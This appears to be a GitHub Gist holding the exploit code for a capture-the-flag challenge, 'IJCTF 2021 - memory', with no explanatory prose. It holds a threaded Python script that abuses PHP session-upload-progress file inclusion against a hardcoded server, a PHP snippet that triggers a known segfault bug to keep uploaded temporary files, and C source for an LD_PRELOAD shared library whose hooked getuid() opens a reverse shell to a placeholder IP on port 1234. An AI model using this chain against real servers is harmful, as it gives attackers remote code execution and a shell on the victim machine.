-
-
Save as3617/fa06307b5c1bcc002e3b646bfcc3500d to your computer and use it in GitHub Desktop.
IJCTF 2021 - memory writeup
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import string | |
import requests | |
from base64 import b64encode | |
from random import sample, randint | |
from multiprocessing.dummy import Pool as ThreadPool | |
HOST = "http://34.131.30.75:31337/" | |
headers = { | |
'Connection': 'Close', | |
'Cookie': 'PHPSESSID=ab24' | |
} | |
headers2 = { | |
'Connection': 'close', | |
'Cookie': 'PHPSESSID=ab25' | |
} | |
payload = open('./exploit.php','rb').read() | |
path = "" | |
def runner1(i): | |
url = "http://34.131.30.75:31337/" | |
data = { | |
'PHP_SESSION_UPLOAD_PROGRESS': payload | |
} | |
while 1: | |
fp = open('./hack.so', 'rb') | |
r = requests.post(HOST+'/?bonus=/var/lib/php/sessions/sess_ab24&error=1', files={'f': fp}, data=data, headers=headers) | |
fp.close() | |
print(r.text) | |
def runner2(i): | |
filename = '/var/lib/php/sessions/sess_ab24' | |
while 1: | |
url = '%s?bonus=%s' % (HOST, filename) | |
r = requests.get(url, headers=headers) | |
c = r.text | |
if c: | |
print(c) | |
def runner3(i): | |
data = { | |
'PHP_SESSION_UPLOAD_PROGRESS': payload2 | |
} | |
fp = open('/etc/passwd', 'rb') | |
filename = '/var/lib/php/sessions/sess_ab25' | |
while 1: | |
url = '%s?bonus=%s' % (HOST, filename) | |
r = requests.post(url, files={'f': fp}, data=data, headers=headers2) | |
c = r.text | |
if c: | |
print(c) | |
if sys.argv[1] == '1': | |
runner = runner1 | |
elif sys.argv[1] == '2': | |
runner = runner2 | |
else: | |
payload2 = f""" | |
<?php | |
putenv('LD_PRELOAD={sys.argv[2]}');mail('a','a','a','a'); | |
?> | |
""" | |
runner = runner3 | |
pool = ThreadPool(32) | |
result = pool.map_async( runner, range(32) ).get(0xffff) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
#https://bugs.php.net/bug.php?id=80246 | |
#segfault -> bypass removing tmpfile | |
if($_GET['error']){ | |
set_error_handler(function() use(&$my_var) { | |
$my_var = 0; | |
}); | |
$my_var = 'nual'; | |
$my_var["foo"]; | |
} | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <arpa/inet.h> | |
#include <netdb.h> | |
#include <unistd.h> | |
#include <errno.h> | |
/* | |
gcc -c -fPIC hack.c -o hack | |
gcc -shared hack -o hack.so | |
*/ | |
void payload() { | |
struct sockaddr_in serveraddr; | |
int server_sockfd; | |
int client_len; | |
char buf[80],rbuf[80], *cmdBuf[2]={"/bin/sh",(char *)0}; | |
server_sockfd = socket(AF_INET, SOCK_STREAM, 6); | |
serveraddr.sin_family = AF_INET; | |
serveraddr.sin_addr.s_addr = inet_addr("ip"); | |
serveraddr.sin_port = htons(atoi("1234")); | |
client_len = sizeof(serveraddr); | |
connect(server_sockfd, (struct sockaddr*)&serveraddr, client_len); | |
dup2(server_sockfd, 0); | |
dup2(server_sockfd, 1); | |
dup2(server_sockfd, 2); | |
execve("/bin/sh",cmdBuf,0); | |
} | |
uid_t getuid() { | |
if (getenv("LD_PRELOAD") == NULL) { return 0; } | |
unsetenv("LD_PRELOAD"); | |
payload(); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment